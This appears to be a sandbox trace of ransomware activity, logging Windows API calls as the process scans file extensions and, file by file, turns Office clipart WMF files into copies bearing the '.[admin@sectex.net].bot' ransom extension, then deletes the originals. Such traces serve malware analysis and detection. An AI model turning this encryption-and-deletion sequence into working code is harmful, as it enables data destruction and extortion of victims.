	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.505] lstrlenW (lpString=".doc") returned 4
	[0158.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString=".docx") returned 5
	[0158.505] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.505] lstrlenW (lpString=".pdf") returned 4
	[0158.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString=".xls") returned 4
	[0158.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.505] lstrlenW (lpString=".xlsx") returned 5
	[0158.505] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.505] lstrlenW (lpString=".ppt") returned 4
	[0158.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.505] lstrlenW (lpString=".zip") returned 4
	[0158.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.505] lstrlenW (lpString=".rar") returned 4
	[0158.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString=".bz2") returned 4
	[0158.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.505] lstrlenW (lpString=".7z") returned 3
	[0158.505] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.506] lstrlenW (lpString=".dbf") returned 4
	[0158.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.506] lstrlenW (lpString=".1cd") returned 4
	[0158.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF") returned 63
	[0158.506] lstrlenW (lpString=".jpg") returned 4
	[0158.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.506] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.506] lstrlenW (lpString="J0105360.WMF") returned 12
	[0158.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0158.549] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8860) returned 1
	[0158.549] CloseHandle (hObject=0x3c0) returned 1
	[0158.550] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf")) returned 0x20
	[0158.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.562] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.562] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.563] GetLastError () returned 0x0
	[0158.563] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x229c, lpOverlapped=0x0) returned 1
	[0158.564] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x22a0, lpOverlapped=0x0) returned 1
	[0158.565] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.565] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.566] SetEndOfFile (hFile=0x25c) returned 1
	[0158.566] CloseHandle (hObject=0x25c) returned 1
	[0158.566] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.566] SetEndOfFile (hFile=0x388) returned 1
	[0158.568] CloseHandle (hObject=0x388) returned 1
	[0158.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf")) returned 1
	[0158.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.569] lstrlenW (lpString=".doc") returned 4
	[0158.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.569] lstrlenW (lpString=".docx") returned 5
	[0158.569] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.569] lstrlenW (lpString=".pdf") returned 4
	[0158.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.569] lstrlenW (lpString=".xls") returned 4
	[0158.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.569] lstrlenW (lpString=".xlsx") returned 5
	[0158.569] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.569] lstrlenW (lpString=".ppt") returned 4
	[0158.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.569] lstrlenW (lpString=".zip") returned 4
	[0158.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.569] lstrlenW (lpString=".rar") returned 4
	[0158.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.569] lstrlenW (lpString=".bz2") returned 4
	[0158.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.569] lstrlenW (lpString=".7z") returned 3
	[0158.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString=".dbf") returned 4
	[0158.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString=".1cd") returned 4
	[0158.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString=".jpg") returned 4
	[0158.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString=".doc") returned 4
	[0158.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString=".docx") returned 5
	[0158.570] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0158.570] lstrlenW (lpString=".pdf") returned 4
	[0158.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString=".xls") returned 4
	[0158.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.570] lstrlenW (lpString=".xlsx") returned 5
	[0158.570] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0158.570] lstrlenW (lpString=".ppt") returned 4
	[0158.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.570] lstrlenW (lpString=".zip") returned 4
	[0158.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.570] lstrlenW (lpString=".rar") returned 4
	[0158.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString=".bz2") returned 4
	[0158.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.570] lstrlenW (lpString=".7z") returned 3
	[0158.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.571] lstrlenW (lpString=".dbf") returned 4
	[0158.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.571] lstrlenW (lpString=".1cd") returned 4
	[0158.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF") returned 63
	[0158.571] lstrlenW (lpString=".jpg") returned 4
	[0158.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.571] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.571] lstrlenW (lpString="J0105376.WMF") returned 12
	[0158.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.572] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4964) returned 1
	[0158.572] CloseHandle (hObject=0x388) returned 1
	[0158.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf")) returned 0x20
	[0158.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.575] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.575] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.576] GetLastError () returned 0x0
	[0158.576] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1364, lpOverlapped=0x0) returned 1
	[0158.579] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0158.580] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.580] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.580] SetEndOfFile (hFile=0x25c) returned 1
	[0158.580] CloseHandle (hObject=0x25c) returned 1
	[0158.580] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.580] SetEndOfFile (hFile=0x388) returned 1
	[0158.583] CloseHandle (hObject=0x388) returned 1
	[0158.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.584] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf")) returned 1
	[0158.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.584] lstrlenW (lpString=".doc") returned 4
	[0158.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.584] lstrlenW (lpString=".docx") returned 5
	[0158.584] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.584] lstrlenW (lpString=".pdf") returned 4
	[0158.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.584] lstrlenW (lpString=".xls") returned 4
	[0158.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.584] lstrlenW (lpString=".xlsx") returned 5
	[0158.584] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.584] lstrlenW (lpString=".ppt") returned 4
	[0158.585] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString=".zip") returned 4
	[0158.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.585] lstrlenW (lpString=".rar") returned 4
	[0158.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString=".bz2") returned 4
	[0158.585] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString=".7z") returned 3
	[0158.585] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString=".dbf") returned 4
	[0158.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString=".1cd") returned 4
	[0158.585] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString=".jpg") returned 4
	[0158.585] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.585] lstrlenW (lpString=".doc") returned 4
	[0158.585] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString=".docx") returned 5
	[0158.585] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0158.585] lstrlenW (lpString=".pdf") returned 4
	[0158.585] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.585] lstrlenW (lpString=".xls") returned 4
	[0158.585] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.586] lstrlenW (lpString=".xlsx") returned 5
	[0158.586] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0158.586] lstrlenW (lpString=".ppt") returned 4
	[0158.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.586] lstrlenW (lpString=".zip") returned 4
	[0158.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.586] lstrlenW (lpString=".rar") returned 4
	[0158.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.586] lstrlenW (lpString=".bz2") returned 4
	[0158.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.586] lstrlenW (lpString=".7z") returned 3
	[0158.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.586] lstrlenW (lpString=".dbf") returned 4
	[0158.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.586] lstrlenW (lpString=".1cd") returned 4
	[0158.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF") returned 63
	[0158.586] lstrlenW (lpString=".jpg") returned 4
	[0158.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.586] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.586] lstrlenW (lpString="J0105378.WMF") returned 12
	[0158.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.587] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4964) returned 1
	[0158.587] CloseHandle (hObject=0x388) returned 1
	[0158.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf")) returned 0x20
	[0158.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.587] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.588] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0158.588] GetLastError () returned 0x0
	[0158.588] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1364, lpOverlapped=0x0) returned 1
	[0158.594] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1370, lpOverlapped=0x0) returned 1
	[0158.594] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.595] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.595] SetEndOfFile (hFile=0x25c) returned 1
	[0158.595] CloseHandle (hObject=0x25c) returned 1
	[0158.595] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.595] SetEndOfFile (hFile=0x388) returned 1
	[0158.751] CloseHandle (hObject=0x388) returned 1
	[0158.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.941] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf")) returned 1
	[0158.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.943] lstrlenW (lpString=".doc") returned 4
	[0158.943] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.943] lstrlenW (lpString=".docx") returned 5
	[0158.943] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.943] lstrlenW (lpString=".pdf") returned 4
	[0158.943] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.943] lstrlenW (lpString=".xls") returned 4
	[0158.943] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.943] lstrlenW (lpString=".xlsx") returned 5
	[0158.944] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.944] lstrlenW (lpString=".ppt") returned 4
	[0158.944] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString=".zip") returned 4
	[0158.944] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.944] lstrlenW (lpString=".rar") returned 4
	[0158.944] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString=".bz2") returned 4
	[0158.944] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString=".7z") returned 3
	[0158.944] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString=".dbf") returned 4
	[0158.944] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString=".1cd") returned 4
	[0158.944] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString=".jpg") returned 4
	[0158.944] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF") returned 63
	[0158.944] lstrlenW (lpString=".doc") returned 4
	[0158.944] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString=".docx") returned 5
	[0158.944] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.944] lstrlenW (lpString=".pdf") returned 4
	[0158.944] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.944] lstrlenW (lpString=".xls") returned 4
